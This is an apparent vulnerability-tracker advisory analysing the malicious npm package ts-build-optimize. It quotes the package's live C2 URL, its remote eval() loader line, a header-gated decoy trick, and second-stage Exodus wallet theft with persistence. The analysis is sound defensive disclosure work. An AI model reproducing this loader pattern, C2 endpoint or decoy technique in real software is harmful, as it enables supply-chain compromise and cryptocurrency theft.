Vulnerability
Malicious code in ts-build-optimize (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (51c637ab7c13ca2f592502f3444ebb24b291422b6388563d04fb8f7ae9030d5a) The package masquerades as a TypeScript helper library (README is lifted from Microsoft's tslib and references --importHelpers, __extends, __assign, and a fake github.com/microsoft/ts-build-optimize/releases URL). The shipped index.js has nothing to do with TypeScript helpers: it exports a function `buildoptimize` whose default arguments are hardcoded to fetch `https://verceljs-kappa.vercel.app/icons/23` and pass the response body directly to `eval()` (index.js:61-63 sets `uuri = "https://verceljs-kappa.vercel.app/icons/"`; index.js:79 executes `eval(JSON.parse(b))`; the function is exported at index.js:95). Any consumer who imports this package and calls `buildoptimize()` — which the name and README imply is a build-time optimizer — will execute arbitrary attacker-controlled JavaScript on the installer/build machine. The Vercel destination is mutable (the author can swap the payload at any time), no hash or signature is verified, and the hosting domain is unrelated to Microsoft or any legitimate tslib publisher. The C2 endpoint serves a benign 6,758-byte PNG decoy when requested without the package's hardcoded `bearrtoken: logo` HTTP header (so casual scanners and `curl` see only an image), but returns 53,347 bytes of JSON-wrapped, heavily-obfuscated JavaScript when the header is present. Static analysis of the fetched second stage (sha256 of the raw response body fd082d2406d65aa78d5f1028e11dc23e85d63f07c459fb048d08236a65590b99; sha256 of the JSON-decoded JavaScript source 47d235dad37c7fb86e231822a4c231344cbd006e58b8cb9a013b064c1a521eb8 — captured 2026-05-15, payload is mutable) shows wallet-theft and persistence functionality: references to the Exodus cryptocurrency wallet on macOS (`/Library/Application Support/exodus.wallet`) and Windows (`/AppData/Roaming/Exodus/exodus.wallet`); functions named `installWindows`, `uninstallWindows`, `installMac`, `uninstallMac`, `isInstalledWindows`, and a `macPlistPath` constant indicating per-OS persistence install/uninstall machinery; heavy use of `child_process.execSync`/`exec` to invoke shell commands; and a top-level `setInterval(main, 30000)` re-execution loop. The combination of name-squat on a widely-used Microsoft package, README impersonation, header-gated decoy, and a remote-eval primitive that delivers wallet-theft + persistence makes this an unambiguous supply-chain attack.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence